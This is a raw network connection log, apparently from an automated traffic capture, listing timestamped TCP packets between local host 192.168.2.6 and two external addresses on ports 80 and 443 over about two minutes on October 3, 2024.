                Oct 3, 2024 03:28:36.885524035 CEST8052942104.26.12.205192.168.2.6
                Oct 3, 2024 03:28:36.885566950 CEST5294480192.168.2.6104.26.12.205
                Oct 3, 2024 03:28:36.885590076 CEST5294280192.168.2.6104.26.12.205
                Oct 3, 2024 03:28:36.885751009 CEST5294480192.168.2.6104.26.12.205
                Oct 3, 2024 03:28:36.890564919 CEST8052944104.26.12.205192.168.2.6
                Oct 3, 2024 03:28:37.350682020 CEST8052944104.26.12.205192.168.2.6
                Oct 3, 2024 03:28:37.352153063 CEST52945443192.168.2.6104.21.54.163
                Oct 3, 2024 03:28:37.352194071 CEST44352945104.21.54.163192.168.2.6
                Oct 3, 2024 03:28:37.352247953 CEST52945443192.168.2.6104.21.54.163
                Oct 3, 2024 03:28:37.352684975 CEST52945443192.168.2.6104.21.54.163
                Oct 3, 2024 03:28:37.352701902 CEST44352945104.21.54.163192.168.2.6
                Oct 3, 2024 03:28:37.434514999 CEST5294480192.168.2.6104.26.12.205
                Oct 3, 2024 03:28:37.807862997 CEST44352945104.21.54.163192.168.2.6
                Oct 3, 2024 03:28:37.811203003 CEST52945443192.168.2.6104.21.54.163
                Oct 3, 2024 03:28:37.811223030 CEST44352945104.21.54.163192.168.2.6
                Oct 3, 2024 03:28:38.138690948 CEST44352945104.21.54.163192.168.2.6
                Oct 3, 2024 03:28:38.141236067 CEST52945443192.168.2.6104.21.54.163
                Oct 3, 2024 03:28:38.141248941 CEST44352945104.21.54.163192.168.2.6
                Oct 3, 2024 03:28:38.432106018 CEST44352945104.21.54.163192.168.2.6
                Oct 3, 2024 03:28:38.432187080 CEST44352945104.21.54.163192.168.2.6
                Oct 3, 2024 03:28:38.439399004 CEST44352945104.21.54.163192.168.2.6
                Oct 3, 2024 03:28:38.439573050 CEST52945443192.168.2.6104.21.54.163
                Oct 3, 2024 03:28:38.439573050 CEST52945443192.168.2.6104.21.54.163
                Oct 3, 2024 03:28:38.439573050 CEST52945443192.168.2.6104.21.54.163
                Oct 3, 2024 03:28:38.443417072 CEST52946443192.168.2.6104.21.54.163
                Oct 3, 2024 03:28:38.443451881 CEST44352946104.21.54.163192.168.2.6
                Oct 3, 2024 03:28:38.444026947 CEST52946443192.168.2.6104.21.54.163
                Oct 3, 2024 03:28:38.444986105 CEST52946443192.168.2.6104.21.54.163
                Oct 3, 2024 03:28:38.444994926 CEST44352946104.21.54.163192.168.2.6
                Oct 3, 2024 03:28:38.901731968 CEST44352946104.21.54.163192.168.2.6
                Oct 3, 2024 03:28:38.903537989 CEST52946443192.168.2.6104.21.54.163
                Oct 3, 2024 03:28:38.903558016 CEST44352946104.21.54.163192.168.2.6
                Oct 3, 2024 03:28:39.017292023 CEST44352946104.21.54.163192.168.2.6
                Oct 3, 2024 03:28:39.017560959 CEST52946443192.168.2.6104.21.54.163
                Oct 3, 2024 03:28:39.017579079 CEST44352946104.21.54.163192.168.2.6
                Oct 3, 2024 03:28:39.320729017 CEST44352946104.21.54.163192.168.2.6
                Oct 3, 2024 03:28:39.320808887 CEST44352946104.21.54.163192.168.2.6
                Oct 3, 2024 03:28:39.320858002 CEST52946443192.168.2.6104.21.54.163
                Oct 3, 2024 03:28:39.321249962 CEST52946443192.168.2.6104.21.54.163
                Oct 3, 2024 03:28:42.028964043 CEST5294480192.168.2.6104.26.12.205
                Oct 3, 2024 03:28:42.031414986 CEST5294880192.168.2.6104.26.12.205
                Oct 3, 2024 03:28:42.034003973 CEST8052944104.26.12.205192.168.2.6
                Oct 3, 2024 03:28:42.034779072 CEST5294480192.168.2.6104.26.12.205
                Oct 3, 2024 03:28:42.036197901 CEST8052948104.26.12.205192.168.2.6
                Oct 3, 2024 03:28:42.036365986 CEST5294880192.168.2.6104.26.12.205
                Oct 3, 2024 03:28:42.036510944 CEST5294880192.168.2.6104.26.12.205
                Oct 3, 2024 03:28:42.041562080 CEST8052948104.26.12.205192.168.2.6
                Oct 3, 2024 03:28:42.510267973 CEST8052948104.26.12.205192.168.2.6
                Oct 3, 2024 03:28:42.511606932 CEST52949443192.168.2.6104.21.54.163
                Oct 3, 2024 03:28:42.511710882 CEST44352949104.21.54.163192.168.2.6
                Oct 3, 2024 03:28:42.511792898 CEST52949443192.168.2.6104.21.54.163
                Oct 3, 2024 03:28:42.512140989 CEST52949443192.168.2.6104.21.54.163
                Oct 3, 2024 03:28:42.512173891 CEST44352949104.21.54.163192.168.2.6
                Oct 3, 2024 03:28:42.604351997 CEST5294880192.168.2.6104.26.12.205
                Oct 3, 2024 03:28:42.972275019 CEST44352949104.21.54.163192.168.2.6
                Oct 3, 2024 03:28:42.974591970 CEST52949443192.168.2.6104.21.54.163
                Oct 3, 2024 03:28:42.974623919 CEST44352949104.21.54.163192.168.2.6
                Oct 3, 2024 03:28:43.096184015 CEST44352949104.21.54.163192.168.2.6
                Oct 3, 2024 03:28:43.096611023 CEST52949443192.168.2.6104.21.54.163
                Oct 3, 2024 03:28:43.096628904 CEST44352949104.21.54.163192.168.2.6
                Oct 3, 2024 03:28:43.429899931 CEST44352949104.21.54.163192.168.2.6
                Oct 3, 2024 03:28:43.429990053 CEST44352949104.21.54.163192.168.2.6
                Oct 3, 2024 03:28:43.430031061 CEST52949443192.168.2.6104.21.54.163
                Oct 3, 2024 03:28:43.430530071 CEST52949443192.168.2.6104.21.54.163
                Oct 3, 2024 03:28:43.430891991 CEST5294880192.168.2.6104.26.12.205
                Oct 3, 2024 03:28:43.431746960 CEST5295080192.168.2.6104.26.12.205
                Oct 3, 2024 03:28:43.435889959 CEST8052948104.26.12.205192.168.2.6
                Oct 3, 2024 03:28:43.435973883 CEST5294880192.168.2.6104.26.12.205
                Oct 3, 2024 03:28:43.436508894 CEST8052950104.26.12.205192.168.2.6
                Oct 3, 2024 03:28:43.436580896 CEST5295080192.168.2.6104.26.12.205
                Oct 3, 2024 03:28:43.450025082 CEST5295080192.168.2.6104.26.12.205
                Oct 3, 2024 03:28:43.454818964 CEST8052950104.26.12.205192.168.2.6
                Oct 3, 2024 03:28:43.895359039 CEST8052950104.26.12.205192.168.2.6
                Oct 3, 2024 03:28:43.896650076 CEST52951443192.168.2.6104.21.54.163
                Oct 3, 2024 03:28:43.896699905 CEST44352951104.21.54.163192.168.2.6
                Oct 3, 2024 03:28:43.896872044 CEST52951443192.168.2.6104.21.54.163
                Oct 3, 2024 03:28:43.897191048 CEST52951443192.168.2.6104.21.54.163
                Oct 3, 2024 03:28:43.897214890 CEST44352951104.21.54.163192.168.2.6
                Oct 3, 2024 03:28:43.997047901 CEST5295080192.168.2.6104.26.12.205
                Oct 3, 2024 03:28:44.352286100 CEST44352951104.21.54.163192.168.2.6
                Oct 3, 2024 03:28:44.354070902 CEST52951443192.168.2.6104.21.54.163
                Oct 3, 2024 03:28:44.354104042 CEST44352951104.21.54.163192.168.2.6
                Oct 3, 2024 03:28:44.470568895 CEST44352951104.21.54.163192.168.2.6
                Oct 3, 2024 03:28:44.470941067 CEST52951443192.168.2.6104.21.54.163
                Oct 3, 2024 03:28:44.470969915 CEST44352951104.21.54.163192.168.2.6
                Oct 3, 2024 03:28:44.757016897 CEST44352951104.21.54.163192.168.2.6
                Oct 3, 2024 03:28:44.757102966 CEST44352951104.21.54.163192.168.2.6
                Oct 3, 2024 03:28:44.757157087 CEST52951443192.168.2.6104.21.54.163
                Oct 3, 2024 03:28:44.757765055 CEST52951443192.168.2.6104.21.54.163
                Oct 3, 2024 03:28:44.759033918 CEST52952443192.168.2.6104.21.54.163
                Oct 3, 2024 03:28:44.759089947 CEST44352952104.21.54.163192.168.2.6
                Oct 3, 2024 03:28:44.759150028 CEST52952443192.168.2.6104.21.54.163
                Oct 3, 2024 03:28:44.759536982 CEST52952443192.168.2.6104.21.54.163
                Oct 3, 2024 03:28:44.759557962 CEST44352952104.21.54.163192.168.2.6
                Oct 3, 2024 03:28:45.216857910 CEST44352952104.21.54.163192.168.2.6
                Oct 3, 2024 03:28:45.218369007 CEST52952443192.168.2.6104.21.54.163
                Oct 3, 2024 03:28:45.218399048 CEST44352952104.21.54.163192.168.2.6
                Oct 3, 2024 03:28:45.352624893 CEST44352952104.21.54.163192.168.2.6
                Oct 3, 2024 03:28:45.352844954 CEST52952443192.168.2.6104.21.54.163
                Oct 3, 2024 03:28:45.352870941 CEST44352952104.21.54.163192.168.2.6
                Oct 3, 2024 03:28:45.530143976 CEST52952443192.168.2.6104.21.54.163
                Oct 3, 2024 03:28:45.530262947 CEST44352952104.21.54.163192.168.2.6
                Oct 3, 2024 03:28:45.530472994 CEST44352952104.21.54.163192.168.2.6
                Oct 3, 2024 03:28:45.530530930 CEST52952443192.168.2.6104.21.54.163
                Oct 3, 2024 03:28:45.530551910 CEST52952443192.168.2.6104.21.54.163
                Oct 3, 2024 03:28:47.844405890 CEST5295080192.168.2.6104.26.12.205
                Oct 3, 2024 03:28:47.844409943 CEST5295380192.168.2.6104.26.12.205
                Oct 3, 2024 03:28:47.849339962 CEST8052953104.26.12.205192.168.2.6
                Oct 3, 2024 03:28:47.849493980 CEST5295380192.168.2.6104.26.12.205
                Oct 3, 2024 03:28:47.849612951 CEST8052950104.26.12.205192.168.2.6
                Oct 3, 2024 03:28:47.849694967 CEST5295380192.168.2.6104.26.12.205
                Oct 3, 2024 03:28:47.849730968 CEST5295080192.168.2.6104.26.12.205
                Oct 3, 2024 03:28:47.854604006 CEST8052953104.26.12.205192.168.2.6
                Oct 3, 2024 03:28:48.327817917 CEST8052953104.26.12.205192.168.2.6
                Oct 3, 2024 03:28:48.329490900 CEST52954443192.168.2.6104.21.54.163
                Oct 3, 2024 03:28:48.329535961 CEST44352954104.21.54.163192.168.2.6
                Oct 3, 2024 03:28:48.329621077 CEST52954443192.168.2.6104.21.54.163
                Oct 3, 2024 03:28:48.330132008 CEST52954443192.168.2.6104.21.54.163
                Oct 3, 2024 03:28:48.330152988 CEST44352954104.21.54.163192.168.2.6
                Oct 3, 2024 03:28:48.497039080 CEST5295380192.168.2.6104.26.12.205
                Oct 3, 2024 03:28:48.790587902 CEST44352954104.21.54.163192.168.2.6
                Oct 3, 2024 03:28:48.791033983 CEST52954443192.168.2.6104.21.54.163
                Oct 3, 2024 03:28:48.815557003 CEST52954443192.168.2.6104.21.54.163
                Oct 3, 2024 03:28:48.815584898 CEST44352954104.21.54.163192.168.2.6
                Oct 3, 2024 03:28:48.815959930 CEST44352954104.21.54.163192.168.2.6
                Oct 3, 2024 03:28:48.817178011 CEST52954443192.168.2.6104.21.54.163
                Oct 3, 2024 03:28:48.859416962 CEST44352954104.21.54.163192.168.2.6
                Oct 3, 2024 03:28:48.923830986 CEST44352954104.21.54.163192.168.2.6
                Oct 3, 2024 03:28:48.930109978 CEST52954443192.168.2.6104.21.54.163
                Oct 3, 2024 03:28:48.930120945 CEST44352954104.21.54.163192.168.2.6
                Oct 3, 2024 03:28:49.261738062 CEST44352954104.21.54.163192.168.2.6
                Oct 3, 2024 03:28:49.261826992 CEST44352954104.21.54.163192.168.2.6
                Oct 3, 2024 03:28:49.261883974 CEST52954443192.168.2.6104.21.54.163
                Oct 3, 2024 03:28:49.262511969 CEST52954443192.168.2.6104.21.54.163
                Oct 3, 2024 03:28:49.262793064 CEST5295380192.168.2.6104.26.12.205
                Oct 3, 2024 03:28:49.263576031 CEST5295580192.168.2.6104.26.12.205
                Oct 3, 2024 03:28:49.267770052 CEST8052953104.26.12.205192.168.2.6
                Oct 3, 2024 03:28:49.267831087 CEST5295380192.168.2.6104.26.12.205
                Oct 3, 2024 03:28:49.268325090 CEST8052955104.26.12.205192.168.2.6
                Oct 3, 2024 03:28:49.268404007 CEST5295580192.168.2.6104.26.12.205
                Oct 3, 2024 03:28:49.268539906 CEST5295580192.168.2.6104.26.12.205
                Oct 3, 2024 03:28:49.273600101 CEST8052955104.26.12.205192.168.2.6
                Oct 3, 2024 03:28:49.733843088 CEST8052955104.26.12.205192.168.2.6
                Oct 3, 2024 03:28:49.735028028 CEST52956443192.168.2.6104.21.54.163
                Oct 3, 2024 03:28:49.735079050 CEST44352956104.21.54.163192.168.2.6
                Oct 3, 2024 03:28:49.735127926 CEST52956443192.168.2.6104.21.54.163
                Oct 3, 2024 03:28:49.735436916 CEST52956443192.168.2.6104.21.54.163
                Oct 3, 2024 03:28:49.735450029 CEST44352956104.21.54.163192.168.2.6
                Oct 3, 2024 03:28:49.793905020 CEST5295580192.168.2.6104.26.12.205
                Oct 3, 2024 03:28:50.194494963 CEST44352956104.21.54.163192.168.2.6
                Oct 3, 2024 03:28:50.196227074 CEST52956443192.168.2.6104.21.54.163
                Oct 3, 2024 03:28:50.196261883 CEST44352956104.21.54.163192.168.2.6
                Oct 3, 2024 03:28:50.314683914 CEST44352956104.21.54.163192.168.2.6
                Oct 3, 2024 03:28:50.314914942 CEST52956443192.168.2.6104.21.54.163
                Oct 3, 2024 03:28:50.314940929 CEST44352956104.21.54.163192.168.2.6
                Oct 3, 2024 03:28:50.639801979 CEST44352956104.21.54.163192.168.2.6
                Oct 3, 2024 03:28:50.639923096 CEST44352956104.21.54.163192.168.2.6
                Oct 3, 2024 03:28:50.640187025 CEST52956443192.168.2.6104.21.54.163
                Oct 3, 2024 03:28:50.640548944 CEST52956443192.168.2.6104.21.54.163
                Oct 3, 2024 03:28:50.641601086 CEST52957443192.168.2.6104.21.54.163
                Oct 3, 2024 03:28:50.641627073 CEST44352957104.21.54.163192.168.2.6
                Oct 3, 2024 03:28:50.642158985 CEST52957443192.168.2.6104.21.54.163
                Oct 3, 2024 03:28:50.642468929 CEST52957443192.168.2.6104.21.54.163
                Oct 3, 2024 03:28:50.642478943 CEST44352957104.21.54.163192.168.2.6
                Oct 3, 2024 03:28:51.120080948 CEST44352957104.21.54.163192.168.2.6
                Oct 3, 2024 03:28:51.121814966 CEST52957443192.168.2.6104.21.54.163
                Oct 3, 2024 03:28:51.121829987 CEST44352957104.21.54.163192.168.2.6
                Oct 3, 2024 03:28:51.240582943 CEST44352957104.21.54.163192.168.2.6
                Oct 3, 2024 03:28:51.240921021 CEST52957443192.168.2.6104.21.54.163
                Oct 3, 2024 03:28:51.240942001 CEST44352957104.21.54.163192.168.2.6
                Oct 3, 2024 03:28:51.530606985 CEST44352957104.21.54.163192.168.2.6
                Oct 3, 2024 03:28:51.530685902 CEST44352957104.21.54.163192.168.2.6
                Oct 3, 2024 03:28:51.530891895 CEST52957443192.168.2.6104.21.54.163
                Oct 3, 2024 03:28:51.531156063 CEST52957443192.168.2.6104.21.54.163
                Oct 3, 2024 03:29:21.545614004 CEST5295580192.168.2.6104.26.12.205
                Oct 3, 2024 03:29:21.550890923 CEST8052955104.26.12.205192.168.2.6
                Oct 3, 2024 03:29:21.551058054 CEST5295580192.168.2.6104.26.12.205
                Oct 3, 2024 03:29:21.553785086 CEST5295880192.168.2.6104.26.12.205
                Oct 3, 2024 03:29:21.558937073 CEST8052958104.26.12.205192.168.2.6
                Oct 3, 2024 03:29:21.559252977 CEST5295880192.168.2.6104.26.12.205
                Oct 3, 2024 03:29:21.559252977 CEST5295880192.168.2.6104.26.12.205
                Oct 3, 2024 03:29:21.564117908 CEST8052958104.26.12.205192.168.2.6
                Oct 3, 2024 03:29:22.024835110 CEST8052958104.26.12.205192.168.2.6
                Oct 3, 2024 03:29:22.026397943 CEST52959443192.168.2.6104.21.54.163
                Oct 3, 2024 03:29:22.026448965 CEST44352959104.21.54.163192.168.2.6
                Oct 3, 2024 03:29:22.026565075 CEST52959443192.168.2.6104.21.54.163
                Oct 3, 2024 03:29:22.026899099 CEST52959443192.168.2.6104.21.54.163
                Oct 3, 2024 03:29:22.026910067 CEST44352959104.21.54.163192.168.2.6
                Oct 3, 2024 03:29:22.098503113 CEST5295880192.168.2.6104.26.12.205
                Oct 3, 2024 03:29:22.548795938 CEST44352959104.21.54.163192.168.2.6
                Oct 3, 2024 03:29:22.551337957 CEST52959443192.168.2.6104.21.54.163
                Oct 3, 2024 03:29:22.551410913 CEST44352959104.21.54.163192.168.2.6
                Oct 3, 2024 03:29:22.676584005 CEST44352959104.21.54.163192.168.2.6
                Oct 3, 2024 03:29:22.678427935 CEST52959443192.168.2.6104.21.54.163
                Oct 3, 2024 03:29:22.678481102 CEST44352959104.21.54.163192.168.2.6
                Oct 3, 2024 03:29:23.025456905 CEST44352959104.21.54.163192.168.2.6
                Oct 3, 2024 03:29:23.025557041 CEST44352959104.21.54.163192.168.2.6
                Oct 3, 2024 03:29:23.026268959 CEST52959443192.168.2.6104.21.54.163
                Oct 3, 2024 03:29:23.026345015 CEST44352959104.21.54.163192.168.2.6
                Oct 3, 2024 03:29:23.026367903 CEST52959443192.168.2.6104.21.54.163
                Oct 3, 2024 03:29:23.026422024 CEST5295880192.168.2.6104.26.12.205
                Oct 3, 2024 03:29:23.026513100 CEST52959443192.168.2.6104.21.54.163
                Oct 3, 2024 03:29:23.027173996 CEST5296080192.168.2.6104.26.12.205
                Oct 3, 2024 03:29:23.031553984 CEST8052958104.26.12.205192.168.2.6
                Oct 3, 2024 03:29:23.031673908 CEST5295880192.168.2.6104.26.12.205
                Oct 3, 2024 03:29:23.031945944 CEST8052960104.26.12.205192.168.2.6
                Oct 3, 2024 03:29:23.032162905 CEST5296080192.168.2.6104.26.12.205
                Oct 3, 2024 03:29:23.032233953 CEST5296080192.168.2.6104.26.12.205
                Oct 3, 2024 03:29:23.038018942 CEST8052960104.26.12.205192.168.2.6
                Oct 3, 2024 03:29:23.514765978 CEST8052960104.26.12.205192.168.2.6
                Oct 3, 2024 03:29:23.516000032 CEST52961443192.168.2.6104.21.54.163
                Oct 3, 2024 03:29:23.516047955 CEST44352961104.21.54.163192.168.2.6
                Oct 3, 2024 03:29:23.516165972 CEST52961443192.168.2.6104.21.54.163
                Oct 3, 2024 03:29:23.516515970 CEST52961443192.168.2.6104.21.54.163
                Oct 3, 2024 03:29:23.516530991 CEST44352961104.21.54.163192.168.2.6
                Oct 3, 2024 03:29:23.611617088 CEST5296080192.168.2.6104.26.12.205
                Oct 3, 2024 03:29:23.987396955 CEST44352961104.21.54.163192.168.2.6
                Oct 3, 2024 03:29:23.989696026 CEST52961443192.168.2.6104.21.54.163
                Oct 3, 2024 03:29:23.989727020 CEST44352961104.21.54.163192.168.2.6
                Oct 3, 2024 03:29:24.123123884 CEST44352961104.21.54.163192.168.2.6
                Oct 3, 2024 03:29:24.123388052 CEST52961443192.168.2.6104.21.54.163
                Oct 3, 2024 03:29:24.123418093 CEST44352961104.21.54.163192.168.2.6
                Oct 3, 2024 03:29:24.453234911 CEST44352961104.21.54.163192.168.2.6
                Oct 3, 2024 03:29:24.453330040 CEST44352961104.21.54.163192.168.2.6
                Oct 3, 2024 03:29:24.453376055 CEST52961443192.168.2.6104.21.54.163
                Oct 3, 2024 03:29:24.453898907 CEST52961443192.168.2.6104.21.54.163
                Oct 3, 2024 03:29:24.454799891 CEST52962443192.168.2.6104.21.54.163
                Oct 3, 2024 03:29:24.454830885 CEST44352962104.21.54.163192.168.2.6
                Oct 3, 2024 03:29:24.454890013 CEST52962443192.168.2.6104.21.54.163
                Oct 3, 2024 03:29:24.455121994 CEST52962443192.168.2.6104.21.54.163
                Oct 3, 2024 03:29:24.455133915 CEST44352962104.21.54.163192.168.2.6
                Oct 3, 2024 03:29:24.920054913 CEST44352962104.21.54.163192.168.2.6
                Oct 3, 2024 03:29:24.923064947 CEST52962443192.168.2.6104.21.54.163
                Oct 3, 2024 03:29:24.923091888 CEST44352962104.21.54.163192.168.2.6
                Oct 3, 2024 03:29:25.035664082 CEST44352962104.21.54.163192.168.2.6
                Oct 3, 2024 03:29:25.035996914 CEST52962443192.168.2.6104.21.54.163
                Oct 3, 2024 03:29:25.036032915 CEST44352962104.21.54.163192.168.2.6
                Oct 3, 2024 03:29:25.319643021 CEST44352962104.21.54.163192.168.2.6
                Oct 3, 2024 03:29:25.319737911 CEST44352962104.21.54.163192.168.2.6
                Oct 3, 2024 03:29:25.320703030 CEST52962443192.168.2.6104.21.54.163
                Oct 3, 2024 03:29:25.320729971 CEST44352962104.21.54.163192.168.2.6
                Oct 3, 2024 03:29:25.320765018 CEST52962443192.168.2.6104.21.54.163
                Oct 3, 2024 03:29:25.321039915 CEST52962443192.168.2.6104.21.54.163
                Oct 3, 2024 03:29:55.321871042 CEST5296080192.168.2.6104.26.12.205
                Oct 3, 2024 03:29:55.321872950 CEST5296480192.168.2.6104.26.12.205
                Oct 3, 2024 03:29:55.326845884 CEST8052964104.26.12.205192.168.2.6
                Oct 3, 2024 03:29:55.327110052 CEST8052960104.26.12.205192.168.2.6
                Oct 3, 2024 03:29:55.327197075 CEST5296080192.168.2.6104.26.12.205
                Oct 3, 2024 03:29:55.327198982 CEST5296480192.168.2.6104.26.12.205
                Oct 3, 2024 03:29:55.327461004 CEST5296480192.168.2.6104.26.12.205
                Oct 3, 2024 03:29:55.332235098 CEST8052964104.26.12.205192.168.2.6
                Oct 3, 2024 03:29:55.790553093 CEST8052964104.26.12.205192.168.2.6
                Oct 3, 2024 03:29:55.791804075 CEST52965443192.168.2.6104.21.54.163
                Oct 3, 2024 03:29:55.791850090 CEST44352965104.21.54.163192.168.2.6
                Oct 3, 2024 03:29:55.791918993 CEST52965443192.168.2.6104.21.54.163
                Oct 3, 2024 03:29:55.794992924 CEST52965443192.168.2.6104.21.54.163
                Oct 3, 2024 03:29:55.795008898 CEST44352965104.21.54.163192.168.2.6
                Oct 3, 2024 03:29:55.934540033 CEST5296480192.168.2.6104.26.12.205
                Oct 3, 2024 03:29:56.282968044 CEST44352965104.21.54.163192.168.2.6
                Oct 3, 2024 03:29:56.302845001 CEST52965443192.168.2.6104.21.54.163
                Oct 3, 2024 03:29:56.302867889 CEST44352965104.21.54.163192.168.2.6
                Oct 3, 2024 03:29:56.404083014 CEST44352965104.21.54.163192.168.2.6
                Oct 3, 2024 03:29:56.422996998 CEST52965443192.168.2.6104.21.54.163
                Oct 3, 2024 03:29:56.423017025 CEST44352965104.21.54.163192.168.2.6
                Oct 3, 2024 03:29:56.770617962 CEST44352965104.21.54.163192.168.2.6
                Oct 3, 2024 03:29:56.770736933 CEST44352965104.21.54.163192.168.2.6
                Oct 3, 2024 03:29:56.770838976 CEST52965443192.168.2.6104.21.54.163
                Oct 3, 2024 03:29:56.771249056 CEST52965443192.168.2.6104.21.54.163
                Oct 3, 2024 03:29:56.771567106 CEST5296480192.168.2.6104.26.12.205
                Oct 3, 2024 03:29:56.772315979 CEST5296680192.168.2.6104.26.12.205
                Oct 3, 2024 03:29:56.776519060 CEST8052964104.26.12.205192.168.2.6
                Oct 3, 2024 03:29:56.776583910 CEST5296480192.168.2.6104.26.12.205
                Oct 3, 2024 03:29:56.777097940 CEST8052966104.26.12.205192.168.2.6
                Oct 3, 2024 03:29:56.777165890 CEST5296680192.168.2.6104.26.12.205
                Oct 3, 2024 03:29:56.777282000 CEST5296680192.168.2.6104.26.12.205
                Oct 3, 2024 03:29:56.782033920 CEST8052966104.26.12.205192.168.2.6
                Oct 3, 2024 03:29:57.044562101 CEST5296680192.168.2.6104.26.12.205
                Oct 3, 2024 03:29:57.090677977 CEST8052966104.26.12.205192.168.2.6
                Oct 3, 2024 03:29:57.147188902 CEST8052966104.26.12.205192.168.2.6
                Oct 3, 2024 03:29:57.147238970 CEST5296680192.168.2.6104.26.12.205
                Oct 3, 2024 03:29:58.203212023 CEST5296780192.168.2.6104.26.12.205
                Oct 3, 2024 03:29:58.208197117 CEST8052967104.26.12.205192.168.2.6
                Oct 3, 2024 03:29:58.208303928 CEST5296780192.168.2.6104.26.12.205
                Oct 3, 2024 03:29:58.208437920 CEST5296780192.168.2.6104.26.12.205
                Oct 3, 2024 03:29:58.213218927 CEST8052967104.26.12.205192.168.2.6
                Oct 3, 2024 03:29:58.682671070 CEST8052967104.26.12.205192.168.2.6
                Oct 3, 2024 03:29:58.684276104 CEST52968443192.168.2.6104.21.54.163
                Oct 3, 2024 03:29:58.684330940 CEST44352968104.21.54.163192.168.2.6
                Oct 3, 2024 03:29:58.684549093 CEST52968443192.168.2.6104.21.54.163
                Oct 3, 2024 03:29:58.685031891 CEST52968443192.168.2.6104.21.54.163
                Oct 3, 2024 03:29:58.685053110 CEST44352968104.21.54.163192.168.2.6
                Oct 3, 2024 03:29:58.796662092 CEST5296780192.168.2.6104.26.12.205
                Oct 3, 2024 03:29:59.148104906 CEST44352968104.21.54.163192.168.2.6
                Oct 3, 2024 03:29:59.150183916 CEST52968443192.168.2.6104.21.54.163
                Oct 3, 2024 03:29:59.150199890 CEST44352968104.21.54.163192.168.2.6
                Oct 3, 2024 03:29:59.286326885 CEST44352968104.21.54.163192.168.2.6
                Oct 3, 2024 03:29:59.286751032 CEST52968443192.168.2.6104.21.54.163
                Oct 3, 2024 03:29:59.286781073 CEST44352968104.21.54.163192.168.2.6
                Oct 3, 2024 03:29:59.680473089 CEST44352968104.21.54.163192.168.2.6
                Oct 3, 2024 03:29:59.680646896 CEST44352968104.21.54.163192.168.2.6
                Oct 3, 2024 03:29:59.680701971 CEST52968443192.168.2.6104.21.54.163
                Oct 3, 2024 03:29:59.681123972 CEST52968443192.168.2.6104.21.54.163
                Oct 3, 2024 03:29:59.681473970 CEST5296780192.168.2.6104.26.12.205
                Oct 3, 2024 03:29:59.682274103 CEST5296980192.168.2.6104.26.12.205
                Oct 3, 2024 03:29:59.686503887 CEST8052967104.26.12.205192.168.2.6
                Oct 3, 2024 03:29:59.686564922 CEST5296780192.168.2.6104.26.12.205
                Oct 3, 2024 03:29:59.687098980 CEST8052969104.26.12.205192.168.2.6
                Oct 3, 2024 03:29:59.687170029 CEST5296980192.168.2.6104.26.12.205
                Oct 3, 2024 03:29:59.687283039 CEST5296980192.168.2.6104.26.12.205
                Oct 3, 2024 03:29:59.692035913 CEST8052969104.26.12.205192.168.2.6
                Oct 3, 2024 03:30:00.179977894 CEST8052969104.26.12.205192.168.2.6
                Oct 3, 2024 03:30:00.181871891 CEST52970443192.168.2.6104.21.54.163
                Oct 3, 2024 03:30:00.181909084 CEST44352970104.21.54.163192.168.2.6
                Oct 3, 2024 03:30:00.182216883 CEST52970443192.168.2.6104.21.54.163
                Oct 3, 2024 03:30:00.182538033 CEST52970443192.168.2.6104.21.54.163
                Oct 3, 2024 03:30:00.182550907 CEST44352970104.21.54.163192.168.2.6
                Oct 3, 2024 03:30:00.325208902 CEST5296980192.168.2.6104.26.12.205
                Oct 3, 2024 03:30:00.675848961 CEST44352970104.21.54.163192.168.2.6
                Oct 3, 2024 03:30:00.680016994 CEST52970443192.168.2.6104.21.54.163
                Oct 3, 2024 03:30:00.680038929 CEST44352970104.21.54.163192.168.2.6
                Oct 3, 2024 03:30:00.817059994 CEST44352970104.21.54.163192.168.2.6
                Oct 3, 2024 03:30:00.818505049 CEST52970443192.168.2.6104.21.54.163
                Oct 3, 2024 03:30:00.818516970 CEST44352970104.21.54.163192.168.2.6
                Oct 3, 2024 03:30:01.122807980 CEST44352970104.21.54.163192.168.2.6
                Oct 3, 2024 03:30:01.122977018 CEST44352970104.21.54.163192.168.2.6
                Oct 3, 2024 03:30:01.126317978 CEST52970443192.168.2.6104.21.54.163
                Oct 3, 2024 03:30:01.132632971 CEST52970443192.168.2.6104.21.54.163
                Oct 3, 2024 03:30:01.134438992 CEST52971443192.168.2.6104.21.54.163
                Oct 3, 2024 03:30:01.134481907 CEST44352971104.21.54.163192.168.2.6
                Oct 3, 2024 03:30:01.134598970 CEST52971443192.168.2.6104.21.54.163
                Oct 3, 2024 03:30:01.135236979 CEST52971443192.168.2.6104.21.54.163
                Oct 3, 2024 03:30:01.135257959 CEST44352971104.21.54.163192.168.2.6
                Oct 3, 2024 03:30:01.607624054 CEST44352971104.21.54.163192.168.2.6
                Oct 3, 2024 03:30:01.646169901 CEST52971443192.168.2.6104.21.54.163
                Oct 3, 2024 03:30:01.646198988 CEST44352971104.21.54.163192.168.2.6
                Oct 3, 2024 03:30:01.773793936 CEST44352971104.21.54.163192.168.2.6
                Oct 3, 2024 03:30:01.774132967 CEST52971443192.168.2.6104.21.54.163
                Oct 3, 2024 03:30:01.774152994 CEST44352971104.21.54.163192.168.2.6
                Oct 3, 2024 03:30:02.093472958 CEST44352971104.21.54.163192.168.2.6
                Oct 3, 2024 03:30:02.093568087 CEST44352971104.21.54.163192.168.2.6
                Oct 3, 2024 03:30:02.093616962 CEST52971443192.168.2.6104.21.54.163
                Oct 3, 2024 03:30:02.094223022 CEST52971443192.168.2.6104.21.54.163
                Oct 3, 2024 03:30:08.342828035 CEST5296980192.168.2.6104.26.12.205
                Oct 3, 2024 03:30:08.343978882 CEST5297280192.168.2.6104.26.12.205
                Oct 3, 2024 03:30:08.348115921 CEST8052969104.26.12.205192.168.2.6
                Oct 3, 2024 03:30:08.348170996 CEST5296980192.168.2.6104.26.12.205
                Oct 3, 2024 03:30:08.348908901 CEST8052972104.26.12.205192.168.2.6
                Oct 3, 2024 03:30:08.349003077 CEST5297280192.168.2.6104.26.12.205
                Oct 3, 2024 03:30:08.349116087 CEST5297280192.168.2.6104.26.12.205
                Oct 3, 2024 03:30:08.353890896 CEST8052972104.26.12.205192.168.2.6
                Oct 3, 2024 03:30:09.501427889 CEST8052972104.26.12.205192.168.2.6
                Oct 3, 2024 03:30:09.501519918 CEST8052972104.26.12.205192.168.2.6
                Oct 3, 2024 03:30:09.501576900 CEST8052972104.26.12.205192.168.2.6
                Oct 3, 2024 03:30:09.503072977 CEST5297280192.168.2.6104.26.12.205
                Oct 3, 2024 03:30:09.503072977 CEST5297280192.168.2.6104.26.12.205
                Oct 3, 2024 03:30:09.507461071 CEST52973443192.168.2.6104.21.54.163
                Oct 3, 2024 03:30:09.507514954 CEST44352973104.21.54.163192.168.2.6
